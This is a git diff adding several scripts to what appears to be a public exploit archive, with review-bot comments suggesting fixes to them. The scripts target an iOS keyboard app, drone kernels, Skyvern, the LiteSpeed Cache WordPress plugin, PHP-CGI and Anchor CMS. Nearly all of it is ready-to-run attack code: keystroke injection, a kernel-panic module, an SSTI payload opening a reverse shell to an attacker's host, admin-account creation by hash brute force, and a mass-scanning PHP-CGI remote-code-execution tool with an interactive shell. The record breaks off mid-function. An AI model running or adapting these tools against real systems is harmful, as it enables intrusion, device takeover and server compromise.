diff --git a/exploits/ios/remote/52333.py b/exploits/ios/remote/52333.py
new file mode 100755
index 000000000..f2f01451f
--- /dev/null
+++ b/exploits/ios/remote/52333.py
@@ -0,0 +1,61 @@
+# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
+# Date: 2025-06-13
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://airkeyboardapp.com
+# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
+# Version: Version 1.0.5
+# Tested on: iOS 18.5 with AirKeyboard app
+
+ '''
+Description:
+ The AirKeyboard iOS application exposes a WebSocket server on port 8888
+which accepts arbitrary input injection messages from any client.
+ No authentication or pairing process is required. This allows any
+attacker to type arbitrary keystrokes directly into the victim’s iOS device
+ in real-time without user interaction, resulting in full remote input
+control.
+'''
+
+import websocket
+import json
+import time
+
+target_ip = "192.168.8.101"
+ws_url = f"ws://{target_ip}:8888"
+text = "i'm hacker i can write on your keyboard :)"
+
+keystroke_payload = {
+ "type": 1,
+ "text": f"{text}",
+ "mode": 0,
+ "shiftKey": True,
+ "selectionStart": 1,
+ "selectionEnd": 1
+}
+
+def send_payload(ws):
+ print("[+] Sending remote keystroke...")
+ ws.send(json.dumps(keystroke_payload))
+ time.sleep(1)
+ ws.close()
+
+def on_open(ws):
+ send_payload(ws)
+
+def on_error(ws, error):
+ print(f"[!] Error: {error}")
+
+def on_close(ws, close_status_code, close_msg):
+ print("[*] Connection closed")
+
+def exploit():
+ print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
+ ws = websocket.WebSocketApp(ws_url,
+ on_open=on_open,
+ on_error=on_error,
+ on_close=on_close)
+ ws.run_forever()
+
+if __name__ == "__main__":
+ exploit()
\ No newline at end of file
diff --git a/exploits/multiple/local/52329.py b/exploits/multiple/local/52329.py
new file mode 100755
index 000000000..5eae557f0
--- /dev/null
+++ b/exploits/multiple/local/52329.py
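Review bot: The wire format is documented only implicitly by `keystroke_payload`; a comment saying where the `type`, `mode`, `selectionStart`/`selectionEnd` values come from (captured from the legitimate client, or guessed) would let a reader judge how far the finding generalises, e.g. `# field values as observed from the official client; meaning of "mode" not verified`. `"text": f"{text}"` is a redundant f-string and should simply be `"text": text`. `target_ip` is a hard-coded constant rather than a command-line argument, so the `Tested on` header line is the only record of the setup used. The description states that no pairing or authentication exists but records no vendor notification or fix status, which the other entries in this commit carry (e.g. a `Remediation Level` line).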
@@ -0,0 +1,223 @@
+#!/usr/bin/env python3
+# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit
+# Author: Mohammed Idrees Banyamer
+# Instagram: @banyamer_security
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-06-10
+# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M
+# CVE: CVE-2025-37928
+# Type: Local Privilege Escalation / Kernel Panic
+# Platform: Linux-based drone OS (Parrot and DJI variants)
+# Author Country: Jordan
+# CVSS v3.1 Score: 7.3 (Important)
+# Weakness: CWE-284: Improper Access Control
+# Attack Vector: Local
+# User Interaction: None
+# Scope: Unchanged
+# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)
+# Exploit Code Maturity: Proof of Concept
+# Remediation Level: Official Fix Available
+#
+# Description:
+# This PoC triggers a kernel panic by calling schedule() inside an atomic context,
+# exploiting CVE-2025-37928 present in certain Linux kernels running on
+# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.
+#
+# Steps of exploitation:
+# 1. Check if running as root.
+# 2. Verify kernel version vulnerability.
+# 3. Detect drone type from system files.
+# 4. Build and load vulnerable kernel module.
+# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.
+#
+# Affected Drone Versions:
+# - Parrot QRD
+# - Parrot Alpha-M (DT)
+# - DJI QRD
+# - DJI Alpha-M (DT)
+#
+# ------------------------------------------------------------------------------
+# Usage:
+# sudo python3 cve_2025_37928_tool.py [OPTIONS]
+#
+# Options:
+# --dry-run Run detection & build only (no module loading)
+# --force Force exploit even if kernel not detected as vulnerable
+# --cleanup-only Remove the kernel module without triggering panic
+# --verbose Enable detailed logging and debug output
+# --help Show usage information
+#
+# Examples:
+# sudo python3 cve_2025_37928_tool.py --dry-run
+# sudo python3 cve_2025_37928_tool.py
+# sudo python3 cve_2025_37928_tool.py --force
+# sudo python3 cve_2025_37928_tool.py --cleanup-only
+#
+# Warning:
+# This PoC causes an immediate kernel panic.
+# Use it ONLY in isolated and controlled environments (e.g., lab tests).
+# ------------------------------------------------------------------------------
+
+import os
+import sys
+import subprocess
+import tempfile
+import argparse
+import shutil
+import platform
+
+MODULE_NAME = "cve_2025_37928_poc"
+C_FILENAME = MODULE_NAME + ".c"
+KO_FILENAME = MODULE_NAME + ".ko"
+
+KERNEL_MODULE_CODE = r'''
+#include
+#include
+#include
+#include
+#include
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("PoC Author");
+MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic");
+
+static void trigger_panic_tasklet(unsigned long data)
+{
+ pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n");
+ schedule(); // This causes kernel panic
+}
+
+DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);
+
+static int __init poc_init(void)
+{
+ pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n");
+ tasklet_schedule(&my_tasklet);
+ return 0;
+}
+
+static void __exit poc_exit(void)
+{
+ tasklet_kill(&my_tasklet);
+ pr_info("[CVE-2025-37928] PoC module unloaded\n");
+}
+
+module_init(poc_init);
+module_exit(poc_exit);
+'''
+
+MAKEFILE_CONTENT = f'''
+obj-m += {MODULE_NAME}.o
+
+all:
+\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+'''
+
+def check_root():
+ if os.geteuid() != 0:
+ print("[-] Must be run as root.")
+ sys.exit(1)
+
+def detect_kernel():
+ version = platform.release()
+ vulnerable_versions = ["5.10", "5.15", "6.0"]
+ vulnerable = any(v in version for v in vulnerable_versions)
+ print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}")
+ return vulnerable
+
+def detect_drone_type():
+ print("[*] Detecting drone type...")
+ files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"]
+ found = []
+ for path in files:
+ if os.path.exists(path):
+ try:
+ with open(path, "r") as f:
+ content = f.read().strip()
+ if any(x in content for x in ["Parrot", "DJI"]):
+ found.append(content)
+ except:
+ continue
+ if found:
+ for d in found:
+ print(f" [i] Found: {d}")
+ else:
+ print(" [!] No drone ID found.")
+ return found
+
+def write_module(tempdir):
+ c_path = os.path.join(tempdir, C_FILENAME)
+ makefile_path = os.path.join(tempdir, "Makefile")
+ with open(c_path, "w") as f:
+ f.write(KERNEL_MODULE_CODE)
+ with open(makefile_path, "w") as f:
+ f.write(MAKEFILE_CONTENT)
+ return c_path
+
+def build_module(tempdir):
+ print("[*] Building module...")
+ result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True)
+ if result.returncode != 0:
+ print("[-] Build failed:\n", result.stderr)
+ sys.exit(1)
+ print("[+] Build successful.")
+ return os.path.join(tempdir, KO_FILENAME)
+
+def load_module(ko_path):
+ print("[*] Loading kernel module...")
+ result = subprocess.run(["insmod", ko_path], capture_output=True, text=True)
+ if result.returncode != 0:
+ print("[-] insmod failed:\n", result.stderr)
+ sys.exit(1)
+ print("[!] Module loaded. Kernel panic should occur if vulnerable.")
+
+def unload_module():
+ print("[*] Attempting to remove module...")
+ subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL)
+ print("[+] Module removal attempted.")
+
+def clean_build(tempdir):
+ subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+
+def main():
+ parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes")
+ parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation")
+ parser.add_argument("--force", action="store_true", help="Force execution even if version unknown")
+ parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded")
+
+ args = parser.parse_args()
+ check_root()
+
+ if args.cleanup_only:
+ unload_module()
+ return
+
+ vulnerable = detect_kernel()
+ detect_drone_type()
+
+ if not vulnerable and not args.force:
+ print("[-] Kernel not identified as vulnerable. Use --force to override.")
+ sys.exit(1)
+
+ if args.dry_run:
+ print("[*] Dry run mode. Exiting before exploitation.")
+ return
+
+ with tempfile.TemporaryDirectory() as tempdir:
+ print(f"[*] Working directory: {tempdir}")
+ write_module(tempdir)
+ ko_path = build_module(tempdir)
+
+ try:
+ load_module(ko_path)
+ except KeyboardInterrupt:
+ print("[!] Interrupted. Attempting cleanup...")
+ finally:
+ unload_module()
+ clean_build(tempdir)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52335.py b/exploits/multiple/webapps/52335.py
new file mode 100755
index 000000000..a97feadf2
--- /dev/null
+++ b/exploits/multiple/webapps/52335.py
@@ -0,0 +1,119 @@
+# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
+# Date: 2025-06-15
+# Exploit Author: Cristian Branet
+# Vendor Homepage: https://www.skyvern.com/
+# Software Link: https://github.com/Skyvern-AI/skyvern
+# Version: < 0.1.85, before commit db856cd
+# Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04)
+# CVE : CVE-2025-49619
+# Article: https://cristibtz.github.io/posts/CVE-2025-49619/
+
+'''
+Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.
+An attacker with low privileges can inject a malicious payload in a block that contains Prompt section,
+which gets rendered server-side, resulting in blind remote code execution via curl.
+'''
+
+import requests, argparse, pyfiglet
+
+parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
+parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)")
+parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key")
+parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
+parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")
+
+def create_exploit_workflow(url, ip, port, x_api_key):
+ exploit_workflow = {
+ "title": "Exploit",
+ "description": "",
+ "proxy_location": "RESIDENTIAL",
+ "webhook_callback_url": "",
+ "persist_browser_session": False,
+ "model": None,
+ "totp_verification_url": None,
+ "workflow_definition": {
+ "parameters": [],
+ "blocks": [
+ {
+ "label": "block_1",
+ "continue_on_failure": False,
+ "block_type": "task_v2",
+ "prompt": (
+ "{% for x in ().__class__.__base__.__subclasses__() %}\n"
+ " {% if 'warning' in x.__name__ %}\n"
+ " {{ x()._module.__builtins__['__import__']('os').popen(\n"
+ " \"python3 -c 'import socket,os,pty;\"\n"
+ " \"s=socket.socket();\"\n"
+ f" \'s.connect((\\\"{ip}\\\",{port}));\'\n"
+ " \"os.dup2(s.fileno(),0);\"\n"
+ " \"os.dup2(s.fileno(),1);\"\n"
+ " \"os.dup2(s.fileno(),2);\"\n"
+ " \"pty.spawn(\\\"sh\\\")'\"\n"
+ " ).read() }}\n"
+ " {% endif %}\n"
+ "{% endfor %}"
+ ),
+ "url": "",
+ "max_steps": 25,
+ "totp_identifier": None,
+ "totp_verification_url": None
+ }
+ ]
+ },
+ "is_saved_task": False
+ }
+
+ headers = {
+ "Content-Type": "application/json",
+ "X-API-Key": x_api_key
+ }
+ response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers)
+
+ if response.status_code == 200:
+ print("[+] Exploit workflow created successfully!")
+ else:
+ print("[-] Failed to create exploit workflow:", response.text)
+ return None
+
+ workflow_permanent_id = response.json().get("workflow_permanent_id")
+
+ print(f"[+] Workflow Permanent ID: {workflow_permanent_id}")
+
+ return workflow_permanent_id
+
+def run_exploit_workflow(url, x_api_key, workflow_permanent_id):
+
+ workflow_data = {
+ "workflow_id": workflow_permanent_id
+ }
+
+ headers = {
+ "Content-Type": "application/json",
+ "X-API-Key": x_api_key
+ }
+ response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)
+
+ if response.status_code == 200:
+ print("[+] Exploit workflow executed successfully!")
+ else:
+ print("[-] Failed to execute exploit workflow:", response.text)
+
+
+if __name__=="__main__":
+
+ print("\n")
+ print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
+ print("Author: Cristian Branet")
+ print("GitHub: github.com/cristibtz")
+ print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.")
+ print("\n")
+
+ args = parser.parse_args()
+ url = args.url
+ x_api_key = args.x_api_key
+ ip = args.ip
+ port = args.port
+
+ workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key)
+
+ run_exploit_workflow(url, x_api_key, workflow_permanent_id)
\ No newline at end of file
diff --git a/exploits/php/webapps/52147.NA b/exploits/php/webapps/52147.NA
deleted file mode 100644
index b35f96ea1..000000000
--- a/exploits/php/webapps/52147.NA
+++ /dev/null
@@ -1,39 +0,0 @@
-# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
-# Date: 04/28/2024
-# Exploit Author: Ahmet Ümit BAYRAM
-# Vendor Homepage: https://anchorcms.com/
-# Software Link:
-https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
-# Version: latest
-# Tested on: MacOS
-
-# Log in to Anchor CMS.
-# Click on "Create New Post".
-# Fill in the "Title" and enter the following payload in the field
-immediately below:
-# ">
-# Go to the homepage, and you will see the alert!
-
-
-### PoC Request ###
-
-POST /anchor/admin/posts/edit/2 HTTP/1.1
-Host: 127.0.0.1
-User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
-Gecko/20100101 Firefox/124.0
-Accept: */*
-Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
-Accept-Encoding: gzip, deflate, br
-X-Requested-With: XMLHttpRequest
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 278
-Origin: http://127.0.0.1
-Connection: close
-Referer: http://127.0.0.1/anchor/admin/posts/edit/2
-Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
-anchorcms=hlko7b1dbdpjgn58himf2obht5
-Sec-Fetch-Dest: empty
-Sec-Fetch-Mode: cors
-Sec-Fetch-Site: same-origin
-
-token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
\ No newline at end of file
diff --git a/exploits/php/webapps/52327.txt b/exploits/php/webapps/52327.txt
new file mode 100644
index 000000000..1a70554db
--- /dev/null
+++ b/exploits/php/webapps/52327.txt
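Review bot: `create_exploit_workflow` returns `None` when the first POST fails, but the `__main__` block passes that result straight to `run_exploit_workflow`, which then posts to `/api/v1/workflows/None/run`; a guard such as `if workflow_permanent_id is None: raise SystemExit(1)` belongs before the final call. The module docstring says the rendered template gives blind remote code execution `via curl`, while the `prompt` block actually embeds a `python3 -c` socket command, so the description should be brought in line with the code. `import requests, argparse, pyfiglet` puts three imports on one line, and `pyfiglet` is a third-party dependency used only for the banner; one import per line and a comment marking `pyfiglet` as optional would match the other Python entries in this commit.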
@@ -0,0 +1,27 @@
+# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
+# Google Dork: inurl:"/admin/pages/add" "Anchor CMS"
+# Date: 2025-06-08
+# Exploit Author: /bin/neko
+# Vendor Homepage: http://anchorcms.com
+# Software Link: https://github.com/anchorcms/anchor-cms
+# Version: 0.12.7
+# Tested on: Ubuntu 22.04 + Apache2 + PHP 8.1
+# CVE: CVE-2025-46041
+
+# Description:
+Anchor CMS v0.12.7 suffers from a stored Cross-Site Scripting (XSS) vulnerability
+in the `markdown` field of the /admin/pages/add page.
+An authenticated user with page creation privileges can inject arbitrary JavaScript,
+which is stored and executed when the page is viewed.
+
+# Steps to Reproduce:
+1. Login to /admin
+2. Navigate to Pages > Add Page
+3. In the `Markdown` field, insert:
+
+4. Save the page.
+5. View the created page. The script executes.
+
+# Impact:
+- Arbitrary JavaScript execution
+- Potential session hijacking or admin impersonation
\ No newline at end of file
diff --git a/exploits/php/webapps/52328.py b/exploits/php/webapps/52328.py
new file mode 100755
index 000000000..20a8f8922
--- /dev/null
+++ b/exploits/php/webapps/52328.py
@@ -0,0 +1,129 @@
+# Exploit Title: Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation
+# Date: 2025-06-10
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# Country: United Kingdom
+# CVE : CVE-2024-28000
+
+
+import requests
+import random
+import string
+import concurrent.futures
+
+# Configuration
+target_url = 'http://example.com'
+rest_api_endpoint = '/wp-json/wp/v2/users'
+ajax_endpoint = '/wp-admin/admin-ajax.php'
+admin_user_id = '1'
+num_hash_attempts = 1000000
+num_workers = 10
+new_username = 'newadminuser' # Replace with desired username
+new_user_password = 'NewAdminPassword123!' # Replace with a secure password
+
+def mt_srand(seed=None):
+ """
+ Mimics PHP's mt_srand function by setting the seed for random number
+generation.
+ """
+ random.seed(seed)
+
+def mt_rand(min_value=0, max_value=2**32 - 1):
+ """
+ Mimics PHP's mt_rand function by generating a random number within the
+specified range.
+ """
+ return random.randint(min_value, max_value)
+
+def generate_random_string(length=6):
+ """
+ Generates a random string based on the output of mt_rand.
+ """
+ chars = string.ascii_letters + string.digits
+ return ''.join(random.choices(chars, k=length))
+
+def trigger_hash_generation():
+ payload = {
+ 'action': 'async_litespeed',
+ 'litespeed_type': 'crawler'
+ }
+ try:
+ response = requests.post(f'{target_url}{ajax_endpoint}',
+data=payload)
+ if response.status_code == 200:
+ print('[INFO] Triggered hash generation.')
+ else:
+ print(f'[ERROR] Failed to trigger hash generation - Status
+code: {response.status_code}')
+ except requests.RequestException as e:
+ print(f'[ERROR] AJAX request failed: {e}')
+
+def attempt_hash(hash_value):
+ cookies = {
+ 'litespeed_hash': hash_value,
+ 'litespeed_role': admin_user_id
+ }
+ try:
+ response = requests.post(f'{target_url}{rest_api_endpoint}',
+cookies=cookies)
+ return response, cookies
+ except requests.RequestException as e:
+ print(f'[ERROR] Request failed: {e}')
+ return None, None
+
+def create_admin_user(cookies):
+ user_data = {
+ 'username': new_username,
+ 'password': new_user_password,
+ 'email': f'{new_username}@example.com',
+ 'roles': ['administrator']
+ }
+ try:
+ response = requests.post(f'{target_url}{rest_api_endpoint}',
+cookies=cookies, json=user_data)
+ if response.status_code == 201:
+ print(f'[SUCCESS] New admin user "{new_username}" created
+successfully!')
+ else:
+ print(f'[ERROR] Failed to create admin user - Status code:
+{response.status_code} - Response: {response.text}')
+ except requests.RequestException as e:
+ print(f'[ERROR] User creation request failed: {e}')
+
+def worker():
+ for _ in range(num_hash_attempts // num_workers):
+ random_string = generate_random_string()
+ print(f'[DEBUG] Trying hash: {random_string}')
+
+ response, cookies = attempt_hash(random_string)
+
+ if response is None:
+ continue
+
+ print(f'[DEBUG] Response status code: {response.status_code}')
+ print(f'[DEBUG] Response content: {response.text}')
+
+ if response.status_code == 201:
+ print(f'[SUCCESS] Valid hash found: {random_string}')
+ create_admin_user(cookies)
+ return
+ elif response.status_code == 401:
+ print(f'[FAIL] Invalid hash: {random_string}')
+ else:
+ print(f'[ERROR] Unexpected response for hash: {random_string} -
+Status code: {response.status_code}')
+
+def main():
+ # Seeding the random number generator (mimicking mt_srand)
+ mt_srand()
+
+ trigger_hash_generation()
+
+ with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as
+executor:
+ futures = [executor.submit(worker) for _ in range(num_workers)]
+ concurrent.futures.wait(futures)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52331.py b/exploits/php/webapps/52331.py
new file mode 100755
index 000000000..683d64add
--- /dev/null
+++ b/exploits/php/webapps/52331.py
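Review bot: The docstrings on `mt_srand` and `mt_rand` claim to mimic PHP's functions, but `random.seed(None)` seeds from OS entropy, `mt_rand` is never called, and `generate_random_string` draws from `random.choices`, so the comment `# Seeding the random number generator (mimicking mt_srand)` in `main` describes something the code does not do; either drop the two helpers or reword their docstrings to say they are unused placeholders. `target_url`, `new_username` and `new_user_password` are hard-coded module constants with `# Replace with ...` comments rather than command-line arguments, which the other Python entries in this commit handle with argparse. `worker` prints every attempt plus the full `response.text` from each of `num_workers = 10` threads, so with `num_hash_attempts = 1000000` the output is mostly noise; one summary line per outcome would keep the log readable.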
@@ -0,0 +1,296 @@
+#!/usr/bin/env python3
+
+# Exploit Title: PHP CGI Module 8.3.4 - Remote Code Execution (RCE)
+# Date: 2025-06-13
+# Exploit Author: @ibrahimsql
+# Exploit Author's github: https://github.com/yigitsql ( old account banned )
+# Vendor Homepage: https://www.php.net/
+# Software Link: https://www.php.net/downloads
+# Version: PHP < 8.3.4, PHP < 8.2.17, PHP < 8.1.27
+# Tested on: Kali Linux 2024.1
+# CVE: CVE-2024-4577
+# Description:
+# A critical vulnerability in PHP's CGI implementation allows remote attackers to execute
+# arbitrary code through command injection. The vulnerability exists due to improper handling
+# of command-line arguments in PHP CGI, which can be exploited to bypass security restrictions
+# and execute arbitrary commands with the privileges of the web server. This vulnerability
+# affects all PHP versions before 8.3.4, 8.2.17, and 8.1.27.
+#
+# Impact:
+# - Remote Code Execution (RCE)
+# - Information Disclosure
+# - Server Compromise
+#
+# References:
+# - https://nvd.nist.gov/vuln/detail/cve-2024-4577
+# - https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure
+# - https://www.tarlogic.com/blog/cve-2024-4577-critical-vulnerability-php/
+# - https://learn.microsoft.com/en-us/answers/questions/1725847/php-8-3-vulnerability-cve-2024-4577
+# - https://www.stormshield.com/news/security-alert-php-cve-2024-4577-stormshields-product-response/
+#
+# Requirements: urllib3>=1.26.0, rich, requests>=2.25.0, alive_progress, concurrent.futures
+
+import re
+import sys
+import base64
+import requests
+import argparse
+from rich.console import Console
+from urllib3 import disable_warnings
+from urllib3.exceptions import InsecureRequestWarning
+from alive_progress import alive_bar
+from concurrent.futures import ThreadPoolExecutor, as_completed
+
+disable_warnings(InsecureRequestWarning)
+
+console = Console()
+
+class PHPCGIExploit:
+ """CVE-2024-4577 PHP CGI Argument Injection RCE Exploit"""
+
+ def __init__(self):
+ self.headers = {
+ "Content-Type": "application/x-www-form-urlencoded",
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
+ }
+
+ # Optimized settings for PHP CGI argument injection
+ self.php_settings = [
+ "-d cgi.force_redirect=0",
+ "-d cgi.redirect_status_env=0",
+ "-d fastcgi.impersonate=1",
+ "-d open_basedir=",
+ "-d disable_functions=",
+ "-d auto_prepend_file=php://input",
+ "-d allow_url_include=1",
+ "-d allow_url_fopen=1"
+ ]
+
+ # Soft hyphen character for Windows systems
+ self.soft_hyphen = "%AD" # 0xAD character
+
+ # Different PHP CGI paths to try
+ self.cgi_paths = [
+ "/php-cgi/php-cgi.exe",
+ "/php/php-cgi.exe",
+ "/cgi-bin/php-cgi.exe",
+ "/php-cgi.exe",
+ "/php.exe",
+ "/php/php.exe"
+ ]
+
+ def ascii_art(self):
+ print("")
+ console.print("[bold red] ____ _ _ ____ ____ ____ ___[/bold red]")
+ console.print("[bold red] | _ \| | | | _ \ / ___|/ ___|_ _|[/bold red]")
+ console.print("[bold red] | |_) | |_| | |_) | | | | | _ | |[/bold red]")
+ console.print("[bold red] | __/| _ | __/ | |___| |_| || |[/bold red]")
+ console.print("[bold red] |_| |_| |_|_| \____|\____|___|[/bold red]")
+ console.print("[bold yellow] CVE-2024-4577 Exploit[/bold yellow]")
+ console.print("[dim white] PHP CGI Argument Injection[/dim white]")
+ console.print("[dim cyan] Developer: @ibrahimsql[/dim cyan]")
+ print("")
+
+ def build_payload_url(self, cgi_path):
+ # Argument injection with soft hyphen
+ settings_str = " ".join(self.php_settings).replace("-", self.soft_hyphen)
+ settings_str = settings_str.replace("=", "%3D").replace(" ", "+")
+ return f"{cgi_path}?{settings_str}"
+
+ def execute_command(self, target, command="whoami", cgi_path=None):
+ """Execute command on target using PHP CGI argument injection"""
+ try:
+ # Create PHP code
+ php_code = f""""""
+
+ # If no CGI path specified, try all paths
+ if cgi_path:
+ paths_to_try = [cgi_path]
+ else:
+ paths_to_try = self.cgi_paths
+
+ for path in paths_to_try:
+ try:
+ payload_url = self.build_payload_url(path)
+ full_url = f"{target.rstrip('/')}{payload_url}"
+
+ response = requests.post(
+ full_url,
+ headers=self.headers,
+ data=php_code,
+ timeout=10,
+ verify=False,
+ allow_redirects=False
+ )
+
+ # Check output
+ if response.status_code == 200:
+ output_match = re.search(r'\[START\](.*?)\[END\]', response.text, re.DOTALL)
+ if output_match:
+ return output_match.group(1).strip(), path
+
+ except requests.exceptions.RequestException:
+ continue
+
+ return None, None
+
+ except Exception as e:
+ console.print(f"[red][-][/red] Error: {str(e)}")
+ return None, None
+
+ def check_vulnerability(self, target):
+ """Check if target is vulnerable"""
+ console.print(f"[blue][*][/blue] Testing target: {target}")
+
+ # Test with a simple command
+ result, cgi_path = self.execute_command(target, "echo CVE-2024-4577-TEST")
+
+ if result and "CVE-2024-4577-TEST" in result:
+ console.print(f"[green][+][/green] Target is vulnerable! CGI Path: {cgi_path}")
+
+ # Get system information
+ sys_info, _ = self.execute_command(target, "systeminfo", cgi_path)
+ if sys_info:
+ console.print("[green][+][/green] System Information:")
+ console.print(f"[dim]{sys_info[:500]}...[/dim]") # First 500 characters
+
+ return True, cgi_path
+ else:
+ console.print(f"[red][-][/red] Target is not vulnerable")
+ return False, None
+
+ def interactive_shell(self, target, cgi_path):
+ """Interactive shell session - Simple version"""
+ console.print("[green][+][/green] Interactive shell opened")
+ console.print("[yellow][!][/yellow] Type 'exit' to quit, 'clear' to clear screen")
+
+ while True:
+ try:
+ # Simple input prompt
+ cmd = input("shell> ")
+
+ if cmd.lower() == "exit":
+ break
+ elif cmd.lower() == "clear":
+ print("\033[2J\033[H", end="")
+ continue
+ elif cmd.strip() == "":
+ continue
+
+ # Execute command
+ result, _ = self.execute_command(target, cmd, cgi_path)
+
+ if result:
+ print(result)
+ else:
+ console.print("[red][-][/red] Command execution failed")
+
+ except KeyboardInterrupt:
+ console.print("\n[yellow][!][/yellow] Use 'exit' to quit")
+ except Exception as e:
+ console.print(f"[red][-][/red] Error: {str(e)}")
+
+ def exploit_target(self, target, output_file=None):
+ """Exploit single target"""
+ is_vulnerable, cgi_path = self.check_vulnerability(target)
+
+ if is_vulnerable:
+ # Save results
+ if output_file:
+ with open(output_file, "a") as f:
+ f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
+
+ # Start interactive shell
+ console.print("[blue][*][/blue] Starting interactive shell...")
+ self.interactive_shell(target, cgi_path)
+ else:
+ if output_file:
+ with open(output_file, "a") as f:
+ f.write(f"[-] Not vulnerable: {target}\n")
+
+ def scan_multiple_targets(self, targets_file, threads=5, output_file=None):
+ """Scan multiple targets"""
+ try:
+ with open(targets_file, "r") as f:
+ targets = [line.strip() for line in f if line.strip()]
+
+ if not targets:
+ console.print("[red][-][/red] No targets found in file")
+ return
+
+ console.print(f"[blue][*][/blue] Scanning {len(targets)} targets with {threads} threads")
+
+ vulnerable_targets = []
+
+ def scan_target(target):
+ try:
+ is_vulnerable, cgi_path = self.check_vulnerability(target)
+ if is_vulnerable:
+ vulnerable_targets.append((target, cgi_path))
+ if output_file:
+ with open(output_file, "a") as f:
+ f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
+ except Exception as e:
+ console.print(f"[red][-][/red] Error scanning {target}: {str(e)}")
+
+ with alive_bar(len(targets), title="Scanning", bar="smooth") as bar:
+ with ThreadPoolExecutor(max_workers=threads) as executor:
+ futures = [executor.submit(scan_target, target) for target in targets]
+ for future in as_completed(futures):
+ future.result()
+ bar()
+
+ # Summary
+ print("")
+ console.print(f"[green][+][/green] Found {len(vulnerable_targets)} vulnerable targets")
+
+ if vulnerable_targets:
+ console.print("\n[bold]Vulnerable Targets:[/bold]")
+ for target, cgi_path in vulnerable_targets:
+ console.print(f" [green]•[/green] {target} (CGI: {cgi_path})")
+
+ except FileNotFoundError:
+ console.print(f"[red][-][/red] File not found: {targets_file}")
+ except Exception as e:
+ console.print(f"[red][-][/red] Error: {str(e)}")
+
+def main():
+ """Main function"""
+ exploit = PHPCGIExploit()
+ exploit.ascii_art()
+
+ parser = argparse.ArgumentParser(
+ description="CVE-2024-4577 - PHP CGI Argument Injection RCE Exploit",
+ formatter_class=argparse.RawDescriptionHelpFormatter,
+ epilog="""
+Examples:
+ python3 exploit.py -u http://target.com
+ python3 exploit.py -f targets.txt -t 10 -o results.txt
+
+Note: This tool is for educational and authorized testing purposes only.
+ """
+ )
+
+ parser.add_argument("-u", "--url", help="Single target URL")
+ parser.add_argument("-f", "--file", help="File containing target URLs")
+ parser.add_argument("-o", "--output", help="Output file for results")
+ parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads (default: 5)")
+
+ args = parser.parse_args()
+
